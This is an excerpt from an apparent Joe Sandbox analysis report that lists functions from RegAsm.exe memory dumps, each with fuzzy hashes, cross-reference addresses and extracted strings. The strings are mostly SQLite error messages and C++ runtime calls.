Opcode Fuzzy Hash: b805d3b9565853708e99e7ae7d1bb92876f5adb27d2dc30a444658b3658ed647
Instruction Fuzzy Hash: E6125F3180414CEADB05EBE6C956BEDBF78AF14308F1444AEE502732C2DB782759DB66

Uniqueness

Uniqueness Score: -1.00%

Function 199473C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

fts5: syntax error near "%.*s", xrefs: 1994751C

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: fts5: syntax error near "%.*s"
API String ID: 0-498961494
Opcode ID: ff8a01b7d2c245fa5bbcc94c39087561c3405d1f47f22cb6e861b3f495000515
Instruction ID: fe79831f17757c7614628e75f780e8286c44a66599290ddb936b423b71c4d33c
Opcode Fuzzy Hash: ff8a01b7d2c245fa5bbcc94c39087561c3405d1f47f22cb6e861b3f495000515
Instruction Fuzzy Hash: 39B1A2B04043559FD712CF28C980B5EBBECAF44348F68491DF8C99B280D775E589CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 199A7300 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 242COMMON

Download Yara Rule

Strings

YHI;, xrefs: 199A7303
%!.15g, xrefs: 199A75C3
-, xrefs: 199A7538

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %!.15g$-$YHI;
API String ID: 0-593447808
Opcode ID: 7b91b45e907c1f34838c78e791b07b4f199f189b2f69d0913f1b987191b4422e
Instruction ID: f9cfe8bb1d6360ed737741137e072de58616905d9adf89b151b67b44fb348423
Opcode Fuzzy Hash: 7b91b45e907c1f34838c78e791b07b4f199f189b2f69d0913f1b987191b4422e
Instruction Fuzzy Hash: 1A917771A083428FD304DF6DD89175AFBE4EBC8344F48492DE889CB351E7B9D9098B92

Uniqueness

Uniqueness Score: -1.00%

Function 1983F7F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

integer overflow, xrefs: 1983F8ED

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: integer overflow
API String ID: 0-1678498654
Opcode ID: 35c1880a8e92f995712971bc958d6bb048eee0cd7a31d1dd2fdb7005ef371397
Instruction ID: 7c9b78707625d9f66ce28a4062d7f010f5cfc51bffd3213a138d2c8a3d9a6f46
Opcode Fuzzy Hash: 35c1880a8e92f995712971bc958d6bb048eee0cd7a31d1dd2fdb7005ef371397
Instruction Fuzzy Hash: 11112675C047156FEB01AF28FC00B8A37A16F26321F9D539DE8991A1E2E761D2C4C3D2

Uniqueness

Uniqueness Score: -1.00%

Function 19837D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

winShmMap3, xrefs: 19837F1D
winShmMap1, xrefs: 19837DC5
winShmMap2, xrefs: 19837E1F

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 0-3826999013
Opcode ID: a2c2b9ee19ddfed1c2de12b45b9fce2e46628c5a6b59190b336d94fad1aa6164
Instruction ID: 9e1579036b6821c0e4200fd7bb40597b14b367576e34fb0a1163d341a5fe18bd
Opcode Fuzzy Hash: a2c2b9ee19ddfed1c2de12b45b9fce2e46628c5a6b59190b336d94fad1aa6164
Instruction Fuzzy Hash: 7D6123725007419FD710EF29CC80A27B7E9FF94745F49482DF98697281EB35EA09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 198635E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198635EA
misuse, xrefs: 198635F4
%s at line %d of [%.10s], xrefs: 198635F9

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 9bde22511a94f2575e3481fb48feb197530855a6197270ba59c168f3cf35a180
Instruction ID: cf8554d3465a09780c4b754f7f5554e8bf188e9de8d15ed8ad5a0395fe5360dd
Opcode Fuzzy Hash: 9bde22511a94f2575e3481fb48feb197530855a6197270ba59c168f3cf35a180
Instruction Fuzzy Hash: 4D51F5F1A04315AFC7048F18C884A56BBA4FF54724F0D817EF85A9F2A2E331E854CB92

Uniqueness

Uniqueness Score: -1.00%

Function 198D96B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198D97E0
%s at line %d of [%.10s], xrefs: 198D97EF
database corruption, xrefs: 198D97EA

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 1fb1e49cb7f46e67c34486a2384c0349f6f802b52bcb000ee912525426a30d5e
Instruction ID: 86cb08db9971e548fe5a7985cb010edfce10568b5a85781b76954f3f77d32db7
Opcode Fuzzy Hash: 1fb1e49cb7f46e67c34486a2384c0349f6f802b52bcb000ee912525426a30d5e
Instruction Fuzzy Hash: 7541167A2067908FD3218F7CD440AD7FBF2AF51211F1C48AED2D68B692E223E485D361

Uniqueness

Uniqueness Score: -1.00%

Function 199A5960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 199A5976
misuse, xrefs: 199A5980
%s at line %d of [%.10s], xrefs: 199A5985

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 3c330e1eb9385448d6df0858b64d7da470647767873d9bbaec00a44ad285fad4
Instruction ID: 78be79e2a748df3757c3a7eabbd554b7dfe0ffea3243971ecfdbbead8a0ecb8d
Opcode Fuzzy Hash: 3c330e1eb9385448d6df0858b64d7da470647767873d9bbaec00a44ad285fad4
Instruction Fuzzy Hash: F5410476B04351ABD301CA55CC80B9EB7A8EF85320F8C556DF9849B241E329E994C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 19865390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198653FE
%s at line %d of [%.10s], xrefs: 1986540D
database corruption, xrefs: 19865408

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 8ef44817704165972759228da5e144cf1a1c7f341bdee3e5b0900e6c7f1e0242
Instruction ID: 059d7009e11876be12cc071081896bed474a75d157b03cab6ff9db100baf0020
Opcode Fuzzy Hash: 8ef44817704165972759228da5e144cf1a1c7f341bdee3e5b0900e6c7f1e0242
Instruction Fuzzy Hash: 03319BAA24479146D3218F38D8407E7B7E19F52B12F4C44AEE9C5CB6E1E312F486C371

Uniqueness

Uniqueness Score: -1.00%

Function 19947ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

error in tokenizer constructor, xrefs: 19947F92
no such tokenizer: %s, xrefs: 19947F1B

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: error in tokenizer constructor$no such tokenizer: %s
API String ID: 0-815501780
Opcode ID: 3b1c16bc85e4ef65acb5f4ed35029b23e9e3ae5995954ff93fcc6dd23cffb1f4
Instruction ID: a7f94b0b81d1246ec10414dc063b0d8620500791eb2c733a42dffc645bb85115
Opcode Fuzzy Hash: 3b1c16bc85e4ef65acb5f4ed35029b23e9e3ae5995954ff93fcc6dd23cffb1f4
Instruction Fuzzy Hash: 9F31C3767002198FC722CF19D880A5AB3E8EF85665F2845ADE988DB340E732EC05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1982F000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

second argument to nth_value must be a positive integer, xrefs: 1982F0C4

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: second argument to nth_value must be a positive integer
API String ID: 0-2620530100
Opcode ID: d63c0fd1c2a39eb5aab9c0555bba6026a99bfb944b45bc1fbf19a599af1af6ca
Instruction ID: 1cef08b7e4760b30bb6defff0702e879d7a1b3528d008bd8b0435b78c48ce512
Opcode Fuzzy Hash: d63c0fd1c2a39eb5aab9c0555bba6026a99bfb944b45bc1fbf19a599af1af6ca
Instruction Fuzzy Hash: B6310AB69043129BD7119F28DC4161A77E0BF50720FCC862DFCA5A62D1E732E9D5CA92

Uniqueness

Uniqueness Score: -1.00%

Function 19865280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198652F2
%s at line %d of [%.10s], xrefs: 19865301
database corruption, xrefs: 198652FC

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 9803d71e240a1bf2e868aad449e010d54dfb594fdd95c349f9c68a18515f29b7
Instruction ID: 5e924f2271d2fba1f2cfd065fdb8bc4be4baac58b7a32149864aaa2bdfaaae16
Opcode Fuzzy Hash: 9803d71e240a1bf2e868aad449e010d54dfb594fdd95c349f9c68a18515f29b7
Instruction Fuzzy Hash: D611357B60011067CB105A58FC00CDBBBA5EFC56B6F4D4569FA485B222E623E921D3F1

Uniqueness

Uniqueness Score: -1.00%

Function 1986FD60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1986FDE6, 1986FE61
%s at line %d of [%.10s], xrefs: 1986FE82
database corruption, xrefs: 1986FE7D

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 757a86d8ce88c06d2633164a65dc10f66ff4176c6777f01e2de83a75d5314aad
Instruction ID: 817fc9be993925fe7b31262416cd1e3d5bbf00f0e7312be42eeece98608106db
Opcode Fuzzy Hash: 757a86d8ce88c06d2633164a65dc10f66ff4176c6777f01e2de83a75d5314aad
Instruction Fuzzy Hash: CC312AA81152818AD3158F24C400762BB61BF65708FACD5CDD4898F7A7E37BC4CBDBA6

Uniqueness

Uniqueness Score: -1.00%

Function 1987D6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

%s%s, xrefs: 1987D725

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%s
API String ID: 0-3252725368
Opcode ID: 45f7598962aeaa789656a929ecb9a73440aad2e98777027e4c9332779e5eae8c
Instruction ID: 87cf02d061667c3a66ebced39546812c91905bea315f2c5c245f16029079ed70
Opcode Fuzzy Hash: 45f7598962aeaa789656a929ecb9a73440aad2e98777027e4c9332779e5eae8c
Instruction Fuzzy Hash: D811AF769002A0AFD7019F7CDC88A5633ACFF8169AF090129FD4DD6244D7359959C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDD9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040DDF3

Part of subcall function 0041D040: std::exception::exception.LIBCMT ref: 0041D055
Part of subcall function 0041D040: __CxxThrowException@8.LIBCMT ref: 0041D06A
Part of subcall function 0041D040: std::exception::exception.LIBCMT ref: 0041D07B

Part of subcall function 0040DD75: std::_Xinvalid_argument.LIBCPMT ref: 0040DD86

memcpy.MSVCRT ref: 0040DE4E

Strings

K@, xrefs: 0040DDD9
invalid string position, xrefs: 0040DDEE

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
String ID: K@$invalid string position
API String ID: 214693668-1222066322
Opcode ID: 28e7152ac8d5654cb071a5c65bb2cff8fa7fa8ee5ccd420e5882225f09a92f80
Instruction ID: 8bbf7088a43f5d4e59009c46584d56dd8ee22e0dd6907cf777bb418e1553b03f
Opcode Fuzzy Hash: 28e7152ac8d5654cb071a5c65bb2cff8fa7fa8ee5ccd420e5882225f09a92f80
